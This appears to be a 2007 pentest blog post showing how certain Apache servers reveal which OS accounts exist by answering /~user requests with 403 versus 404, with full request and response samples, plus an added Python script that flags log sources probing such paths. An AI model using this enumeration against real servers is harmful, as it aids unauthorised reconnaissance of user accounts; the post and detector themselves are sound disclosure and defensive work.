Wednesday, October 17, 2007

Enumerating OS Accounts through Web Server

We noticed an interesting vulnerability during a recent pentest. This vulnerability is specific to certain versions of Apache web server running on *nix boxes.

The vulnerability is that one can enumerate OS accounts just by looking at the response code and message the web server returns when one tries to access the home directory of a particular user. Suppose one tries to access the home directory of the root user; the request from the browser would look something like this:

http://X.X.X.X/~root

GET /~root HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive


The response received had error code 403:

HTTP/1.x 403 Forbidden
Date: Wed, 17 Oct 2007 06:45:58 GMT
Server: Apache
Keep-Alive: timeout=15
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

Along with the 403, an error message like "You don't have permission to access /~root on this server." is displayed. The 403 itself shows that the account exists: the server found a home directory for root but was not permitted to serve from it.

When the same request is tried for a non-existent user (neo in the following case), the error code and message in the response are different.

http://X.X.X.X/~neo

GET /~neo HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive


The response received had error code 404. The error message in this case was "The requested URL /~neo was not found on this server.":

HTTP/1.x 404 Not Found
Date: Wed, 17 Oct 2007 06:45:58 GMT
Server: Apache
Keep-Alive: timeout=15
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
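As an added example (not part of the original post), the same 403-versus-404 pattern can be spotted from the defender's side in the access log: a source that walks many /~user paths and collects 403s has confirmed which accounts exist. The script below parses constructed Apache combined-log lines (the IPs, names and timestamps are made up for illustration) and reports each probing source together with the account names the server implicitly confirmed.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined-log format (not taken from the original post).
# The first source probes several /~user paths: 403 for real accounts, 404 for missing ones.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Oct/2007:06:45:58 +0000] "GET /~root HTTP/1.1" 403 219 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Oct/2007:06:45:59 +0000] "GET /~neo HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Oct/2007:06:46:00 +0000] "GET /~bin HTTP/1.1" 403 219 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Oct/2007:06:46:01 +0000] "GET /~daemon HTTP/1.1" 403 219 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Oct/2007:06:46:02 +0000] "GET /~trinity HTTP/1.1" 404 211 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Oct/2007:06:50:00 +0000] "GET /~alice/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Oct/2007:06:50:05 +0000] "GET /index.html HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
"""

# ip, request method/path, and status code from a combined-log line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# per-user directory requests: /~name, /~name/, /~name/page.html
USERDIR_RE = re.compile(r'^/~(?P<user>[^/?#]+)')


def parse_line(line):
    """Return (ip, path, status) for a combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("path"), int(m.group("status"))


def find_userdir_probes(log_text, min_distinct_users=3):
    """Flag source IPs that requested at least min_distinct_users distinct /~user paths.

    'probed' lists every name a source tried; 'leaked' lists the names the server confirmed,
    i.e. answered 403 (account exists, directory not servable, as in the post) or 200.
    """
    probed = defaultdict(set)
    leaked = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, status = rec
        um = USERDIR_RE.match(path)
        if not um:
            continue
        user = um.group("user")
        probed[ip].add(user)
        if status in (200, 403):  # 404 only says the name does not exist
            leaked[ip].add(user)
    return {ip: {"probed": sorted(users), "leaked": sorted(leaked[ip])}
            for ip, users in probed.items() if len(users) >= min_distinct_users}
```

Running `find_userdir_probes(SAMPLE_LOG)` flags only 203.0.113.5, with bin, daemon and root as the accounts it confirmed; the single /~alice/ request from the second source stays below the threshold.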
